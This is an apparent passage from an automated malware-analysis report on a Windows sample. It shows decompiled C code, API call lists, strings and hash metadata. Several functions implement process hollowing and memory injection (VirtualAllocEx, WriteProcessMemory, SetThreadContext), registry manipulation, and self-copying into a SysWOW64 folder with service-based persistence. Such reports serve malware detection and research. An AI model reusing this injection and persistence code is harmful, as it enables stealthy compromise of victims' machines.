lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
wsprintfA.USER32 ref: 0040A0B6
lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
GetCommandLineA.KERNEL32 ref: 0040A1E5

Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,004122F8,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52

lstrlenA.KERNEL32(?), ref: 0040A288
StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
GetLastError.KERNEL32 ref: 0040A3ED
Sleep.KERNEL32(000003E8), ref: 0040A400
DeleteFileA.KERNEL32(C:\Users\user\Desktop\HsWJJz7nq4.exe), ref: 0040A407
CreateThread.KERNEL32(00000000,00000000,0040405E,00000000,00000000,00000000), ref: 0040A42C
WSAStartup.WS2_32(00001010,?), ref: 0040A43A
CreateThread.KERNEL32(00000000,00000000,0040877E,00000000,00000000,00000000), ref: 0040A469
Sleep.KERNEL32(00000BB8), ref: 0040A48A
GetTickCount.KERNEL32 ref: 0040A49F
GetTickCount.KERNEL32 ref: 0040A4B7
Sleep.KERNEL32(00002710), ref: 0040A4C3

Strings

D, xrefs: 00409F8E
P, xrefs: 00409DAA
C:\Users\user\Desktop\HsWJJz7nq4.exe, xrefs: 0040A2CB, 0040A3CC, 0040A3E1, 0040A406, 0040A413
\, xrefs: 00409D0C
", xrefs: 0040A189
", xrefs: 00409EDB
%X%08X, xrefs: 0040A0B0
C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, xrefs: 0040A1D9
", xrefs: 0040A078
mmeemcze, xrefs: 0040A389, 0040A397

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpy$CommandDriveLineModeProcessThreadTimeTypelstrlen$AllocateAttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterHeapInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
String ID: "$"$"$%X%08X$C:\Users\user\Desktop\HsWJJz7nq4.exe$C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe$D$P$\$mmeemcze
API String ID: 2420586017-3461689486
Opcode ID: a4900106f2d7a94a5a02d520730787094398a3223b4e88a76087a32d9905b461
Instruction ID: 854f92f710d489262c02351978cf0e467b62b472cea35bfdd38dff102a78baab
Opcode Fuzzy Hash: a4900106f2d7a94a5a02d520730787094398a3223b4e88a76087a32d9905b461
Instruction Fuzzy Hash: AB5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040637C, Relevance: 6.1, APIs: 4, Instructions: 67
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				void* _t18;
				int _t20;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4); // executed
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t18 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40); // executed
						_t37 = _t18;
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							_t20 = WriteProcessMemory(_a8, _t37, _v8, _t26, 0); // executed
							if(_t20 != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}

0x00406384
0x00406395
0x0040639a
0x004063a9
0x004063af
0x004063b4
0x004063f5
0x004063f5
0x004063b6
0x004063b9
0x004063ca
0x004063d0
0x004063d4
0x00000000
0x004063d6
0x004063da
0x004063eb
0x004063f3
0x004063fc
0x00406406
0x0040640a
0x00000000
0x00000000
0x00000000
0x004063f3
0x004063d4
0x0040640f
0x00406386
0x00406389
0x00406389

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocVirtual$HandleMemoryModuleProcessWrite
String ID:
API String ID: 1965334864-0
Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408328, Relevance: 35.4, APIs: 18, Strings: 2, Instructions: 361
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00408328(char* __ecx, char __edx) {
				char _v8;
				void* _v12;
				int _v16;
				char _v20;
				intOrPtr _v24;
				int _v28;
				struct _PROCESS_INFORMATION _v44;
				char _v60;
				struct _STARTUPINFOA _v128;
				char _v388;
				char _v427;
				char _v428;
				char _t88;
				char _t89;
				void* _t91;
				char _t93;
				int _t102;
				char _t107;
				intOrPtr _t113;
				char _t116;
				void* _t117;
				signed int _t122;
				char _t126;
				void* _t128;
				char* _t130;
				char _t131;
				char* _t133;
				char _t134;
				char* _t137;
				int _t139;
				char _t144;
				char _t146;
				char* _t147;
				char _t149;
				char _t153;
				intOrPtr* _t154;
				char* _t156;
				char* _t159;
				char _t160;
				char _t165;
				void* _t174;
				signed int _t177;
				char _t180;
				char* _t188;
				int _t189;
				long _t193;
				void* _t195;
				void* _t196;
				void* _t198;
				void* _t199;

				_t181 = __edx;
				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8); // executed
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0040EED1(_v8,  *0x412c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags = "C:\\Windows\\SysWOW64\\mmeemcze\\kwrovuui.exe"; // 0x43
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C("C:\\Windows\\SysWOW64\\mmeemcze\\kwrovuui.exe",  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags = "C:\\Windows\\SysWOW64\\mmeemcze\\kwrovuui.exe"; // 0x43
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A

Strings

localcfg, xrefs: 00408348
C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe, xrefs: 004085C8, 004085D5, 004085E5

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Value$CloseOpenQuery
String ID: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe$localcfg
API String ID: 237177642-410004681
Opcode ID: 0725b14a044649b4ed24bd557adfee549ca648febe333d1d5bf3feab66c71068
Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
Opcode Fuzzy Hash: 0725b14a044649b4ed24bd557adfee549ca648febe333d1d5bf3feab66c71068
Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 004073FF, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 345
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
				CHAR* _v8;
				void* _v12;
				int _v16;
				void* _v20;
				int* _v24;
				char* _v28;
				intOrPtr _v32;
				int _v36;
				char _v295;
				char _v296;
				char _v556;
				void _v592;
				intOrPtr* _t85;
				int** _t86;
				char* _t87;
				char* _t88;
				intOrPtr _t89;
				char* _t91;
				long _t92;
				signed int _t93;
				long _t97;
				signed int _t103;
				long _t107;
				char* _t118;
				intOrPtr* _t119;
				CHAR* _t123;
				void* _t125;
				char* _t127;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr _t137;
				signed int* _t146;
				int** _t147;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				void* _t165;
				intOrPtr _t167;
				intOrPtr _t172;
				intOrPtr* _t173;
				void* _t186;
				intOrPtr _t187;
				int* _t188;
				void* _t190;
				void* _t191;
				char* _t192;
				signed int _t194;
				int* _t196;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t206;

				_t165 = __ecx;
				_t85 = _a8;
				_t188 = 0;
				_v16 = 0x104;
				if(_t85 != 0) {
					 *_t85 = 0;
				}
				_t86 = _a12;
				if(_t86 != _t188) {
					 *_t86 = _t188;
				}
				_t87 = _a16;
				if(_t87 != _t188) {
					 *_t87 = 0;
				}
				_t88 = _a20;
				if(_t88 != _t188) {
					 *_t88 = 0; // executed
				}
				_t89 = E00406DC2(_t165); // executed
				_v32 = _t89;
				_t160 = 0xe4;
				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8);
				_t204 = _t203 + 0x14;
				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed
				_push(0x100);
				_push(_t188);
				_push(0x4122f8);
				if(_t92 != 0) {
					_t93 = E0040EE2A(_t165);
					goto L66;
				} else {
					E0040EE2A(_t165);
					_t206 = _t204 + 0xc;
					_push(_v16);
					_push( &_v556);
					_v24 = _t188;
					_push(_t188);
					while(1) {
						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed
						if(_t97 != 0) {
							break;
						}
						if(E00406CAD( &_v556) == 0) {
							L41:
							_v24 =  &(_v24[0]);
							_push(0x104);
							_v16 = 0x104;
							_push( &_v556);
							_push(_v24);
							continue;
						}
						_t103 = E0040F1A5( &_v556);
						_pop(_t167);
						if((_t103 ^ 0x5e5e5e5e) != _v32) {
							goto L41;
						}
						_v12 = _t188;
						_v16 = 0x104;
						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed
						if(_t107 != _t188) {
							L45:
							if(_t107 != 5) {
								L50:
								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
								_t206 = _t206 + 0xc;
								L39:
								if(_v12 != _t188) {
									RegCloseKey(_v12);
								}
								goto L41;
							}
							E0040EF00(_a16,  &_v556);
							if(_v12 != _t188) {
								RegCloseKey(_v12);
							}
							_push(4);
							_pop(0);
							L64:
							RegCloseKey(_v20);
							return 0;
						}
						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
						_t206 = _t206 + 0x14;
						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
						if(_t107 != _t188) {
							goto L45;
						}
						_t119 =  &_v556;
						_t186 = _t119 + 1;
						do {
							_t167 =  *_t119;
							_t119 = _t119 + 1;
						} while (_t167 != 0);
						if(_v16 <= _t119 - _t186) {
							goto L50;
						}
						_t123 = E0040EE95( &_v296,  &_v556);
						_pop(_t167);
						_v8 = _t123;
						if(_t123 == _t188) {
							goto L50;
						}
						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						_t206 = _t206 + 0x1c;
						if(_t125 == 0) {
							_t188 = 0;
							goto L50;
						}
						if(_v296 != 0x22) {
							_t127 = E0040ED03( &_v296, 0x20);
							_pop(_t167);
						} else {
							E0040EF00( &_v296,  &_v295);
							_t127 = E0040ED03( &_v296, 0x22);
							_t206 = _t206 + 0x10;
						}
						if(_t127 != 0) {
							 *_t127 = 0;
						}
						_v8 = E0040EE95( &_v296,  &_v556);
						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
						_t134 = _a4;
						_t206 = _t206 + 0x30;
						_t190 = _t134 + 1;
						do {
							_t172 =  *_t134;
							_t134 = _t134 + 1;
						} while (_t172 != 0);
						_t173 = _v8;
						_t191 = _t134 - _t190;
						_t43 = _t173 + 1; // 0x1
						_t136 = _t43;
						do {
							_t187 =  *_t173;
							_t173 = _t173 + 1;
						} while (_t187 != 0);
						_t174 = _t173 - _t136;
						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
							_t192 = _v28;
							 *_t192 = 0;
							_t137 = E0040ED23(_v8, 0x5c);
							_v8 = _t137;
							if(_t137 != 0) {
								_v8 = _v8 + 1;
							} else {
								_v8 =  &_v296;
							}
							if(E00406CAD(_v8) == 0) {
								 *_t192 = 0x2e;
								goto L38;
							} else {
								_t194 = E0040F1A5(_v8) ^ 0x5e5e5e5e;
								_t163 = _t194 >> 0x00000008 & 0x000000ff;
								 *_v28 = 0x2e;
								if(E00406C96(_t194) != 0) {
									L37:
									_t160 = 0xe4;
									L38:
									_t188 = 0;
									goto L39;
								}
								_t56 = _t163 - 0x51; // -81
								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
									goto L37;
								} else {
									_t196 = 0;
									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
										_t196 = 1;
									}
									_t146 = _a8;
									if(_t146 != 0) {
										 *_t146 = _t163;
									}
									_t164 = _a16;
									if(_t164 != 0) {
										_t202 = _v8 -  &_v296;
										E0040EE08(_t164,  &_v296, _t202);
										 *((char*)(_t202 + _t164)) = 0;
									}
									if(_a20 != 0) {
										E0040EF00(_a20, _v8);
									}
									_t147 = _a12;
									if(_t147 != 0) {
										 *_t147 = _t196;
									}
									_push(3);
									_pop(0);
									goto L63;
								}
							}
						} else {
							E0040EF00(_a16,  &_v556);
							L63:
							RegCloseKey(_v12); // executed
							goto L64;
						}
					}
					_t93 = RegCloseKey(_v20);
					L66:
					return _t93 | 0xffffffff;
				}
			}

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,73B743E0,00000000), ref: 00407472
RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,73B743E0,00000000), ref: 004074F0
RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,73B743E0,00000000), ref: 00407528
___ascii_stricmp.LIBCMT ref: 0040764D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,73B743E0,00000000), ref: 004076E7
RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 00407717
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,73B743E0,00000000), ref: 00407745
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,73B743E0,00000000), ref: 004077EF

Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD

GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
RegCloseKey.KERNELBASE(?), ref: 004077E6

Strings

", xrefs: 00407599

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
String ID: "
API String ID: 3433985886-123907689
Opcode ID: f6ba5331e6759a7c13200e1095f170a5ecf38920a0726b355cc9583edcbb1e75
Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
Opcode Fuzzy Hash: f6ba5331e6759a7c13200e1095f170a5ecf38920a0726b355cc9583edcbb1e75
Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69

Uniqueness

Uniqueness Score: -1.00%

Function 0216003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D

Strings

kernel32.dll, xrefs: 0216008F, 02160095
cess, xrefs: 0216018D

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 948392fcf9807880d1b0499f9aff85980705dcac733adbde052e94d72bd18024
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: FF526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040977C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionprocessCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				int _t26;
				int _t30;
				void* _t33;
				int _t39;
				int _t42;

				_t46 = __ecx;
				E0040EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				_t26 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20); // executed
				if(_t26 != 0) {
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					_t30 = GetThreadContext(_v20.hThread,  &_v812); // executed
					if(_t30 != 0) {
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24); // executed
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						_t39 = WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??); // executed
						if(_t39 == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						_t42 = SetThreadContext(_v20.hThread,  &_v812); // executed
						if(_t42 == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread); // executed
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}

0x0040977c
0x0040978f
0x004097a9
0x004097b1
0x004097b9
0x004097cf
0x004097e1
0x004097eb
0x004097f3
0x00409811
0x00409819
0x0040981c
0x004097f6
0x004097f9
0x00000000
0x004097f9
0x00409831
0x00409839
0x00000000
0x00000000
0x0040983e
0x0040984e
0x00409856
0x00000000
0x00000000
0x0040985b
0x00000000
0x00409863
0x004097f5
0x004097f5
0x00000000
0x004097f5
0x004097bb
0x00000000

APIs

CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
GetThreadContext.KERNELBASE(?,?,?,?,?,?,?,004122F8), ref: 004097EB
TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
SetThreadContext.KERNELBASE(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B

Strings

D, xrefs: 004097A9

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
String ID: D
API String ID: 2981417381-2746444292
Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404280, Relevance: 7.6, APIs: 5, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t39;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t39 = FindCloseChangeNotification(_v8); // executed
						_t40 = _t39 | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0040ECA5();
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
